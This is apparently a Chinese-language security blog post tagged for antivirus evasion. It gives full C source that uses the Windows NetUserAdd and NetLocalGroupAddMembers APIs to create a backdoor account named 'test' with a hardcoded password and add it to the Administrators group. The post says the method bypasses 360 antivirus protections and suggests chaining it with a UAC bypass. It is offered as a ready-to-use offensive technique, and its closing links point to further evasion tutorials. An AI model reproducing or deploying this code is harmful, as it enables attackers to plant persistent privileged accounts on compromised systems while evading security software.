type
Post
status
Published
date
Mar 1, 2023
slug
bypass-Adduser
summary
tags
学习
免杀
category
技术分享
icon
password
💡
前言:在某些系统环境下,管理员账户可能被禁用或受到限制,这就需要使用其他账户进行添加用户操作。而360等杀毒软件通常会对系统进行加固,限制管理员权限,导致无法直接添加用户。
下面是使用系统API绕过360添加用户的方法
👉
(下面代码需要管理员权限,这里提供一个思路,你可以结合bypassuac使用)
#include <windows.h> #include <lm.h> #include <stdio.h> #pragma comment(lib, "netapi32.lib") int main() { LPWSTR servename = NULL; DWORD level = 1; DWORD parm_error = 0; wchar_t username[] = L"test"; //待添加的用户名 wchar_t password[] = L"1q@W3e$r"; //待添加的用户密码 wchar_t groupname[] = L"administrators"; //要加入的本地组名 USER_INFO_1 ui1 = { 0 }; ui1.usri1_name = username; ui1.usri1_password = password; ui1.usri1_password_age = 0; ui1.usri1_priv = USER_PRIV_USER; ui1.usri1_home_dir = NULL; ui1.usri1_comment = NULL; ui1.usri1_flags = UF_SCRIPT; ui1.usri1_script_path = NULL; //用于将新用户加入到Administrators组中 LOCALGROUP_MEMBERS_INFO_3 lmi3 = { 0 }; lmi3.lgrmi3_domainandname = username; //调用NetUserAdd函数,将待添加用户添加到系统中 NET_API_STATUS result = NetUserAdd(servename, level, (LPBYTE)&ui1, &parm_error); if (result == NERR_Success) { printf("[+] User added successfully\n"); } else { printf("[-] Failed to add user:%d\n", result); } //调用NetLocalGroupAddMembers函数,将新用户添加到Administrators组中 result = NetLocalGroupAddMembers(servename, groupname, 3, (LPBYTE)&lmi3, 1); if (result == NERR_Success) { printf("[+] Administrators group added successfully\n"); } else { printf("[-] Failed to add Administrators group:%d\n", result); } return 0; }
 
 
HW蓝队下的攻防思路Shellcode JS加载器 免杀教程